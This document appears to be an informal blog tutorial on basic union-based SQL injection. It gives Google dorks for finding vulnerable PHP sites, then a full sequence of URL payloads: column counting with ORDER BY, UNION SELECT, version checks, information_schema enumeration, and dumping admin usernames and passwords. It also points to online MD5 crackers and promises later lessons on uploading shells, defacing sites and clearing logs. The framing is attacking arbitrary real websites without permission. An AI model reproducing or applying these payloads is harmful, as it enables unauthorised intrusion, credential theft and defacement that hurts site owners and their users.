Basic SQL Injection
Finding the vulnerability
There are some Google dorks using that Google dork you can find the vulnerability. So here I am giving the most famous Google dork. How to use that dork ? Nothing to do just go to Google and paste the Google dork.
inurl:php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
Now open any Google result and after the link just add ' (like this –> www.site.com/php?id=5’) if you found any error or any missing data from the webpage then the website is vulnerable to SQL injection. Now We have found the SQL vulnerable website.
Lets find the No of column
To find number of columns we use statement ORDER BY (tells database how to order the result). so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <—no error
http://www.site.com/news.php?id=5 order by 1/* <—no error
http://www.site.com/news.php?id=5 order by 2/* <—no error
http://www.site.com/news.php?id=5 order by 3/* <—no error
http://www.site.com/news.php?id=5 order by 4/ <—Error (<-- error (we get message like this Unknown column '4' in 'order clause' or something like that))
That means that the it has 3 columns, cause we got an error on 4. Now lets use the union function to grab most venerable point.
http://www.site.com/news.php?id=5 union all select 1,2,3/* (is its not showing the most vulnerable point then simply add – before 5 )
Now if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works.
Now lets say that 2 is the most vulnerable point of the website, Now lets find the version of the database if the version is grater then 5 then this method will work. Else there is a another method because there is no information_schema.
Lets find the version
http://www.site.com/news.php?id=5 union all select 1,version(),3/*
Now we got the version grater then 5 now this method will work.
http://www.site.com/news.php?id=5 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() /*
Now we got some list of the table but we are interested only in admin id and password.
Look in that list of table is there any table called admin , admin penal etc.
http://www.site.com/news.php?id=5 union all select 1,group_concat(columns_name),3 from information_schema.columns where table_schema=database() /*
Ok, search for things similar to: user, username, users, id and pass, password, passwd, passw, pw.
Here I found: ru_user & ru_pass
Ok now we do this:
http://www.site.com/news.php?id=5 union all select 1,group_concat(ru_user,0x3a,ru_pass),3 from ru_admin /*
Now you got the user and password, in my case I got the plane text but sometime it will give you the hash you need to crack that hash. If there are 32 characters and A-F 1-9 then it is an md5 hash. md5decrypter.co.uk, md5crack.com are examples of online crackers, also Google the hash, it can give results. Error based SQL Injection is complete. Now use some Admin finer to get the admin penal. And in my net tutorial I will explain how to upload the shell , defacing a index page and clearing the logs.
If you have any query then feel free to make a comment.
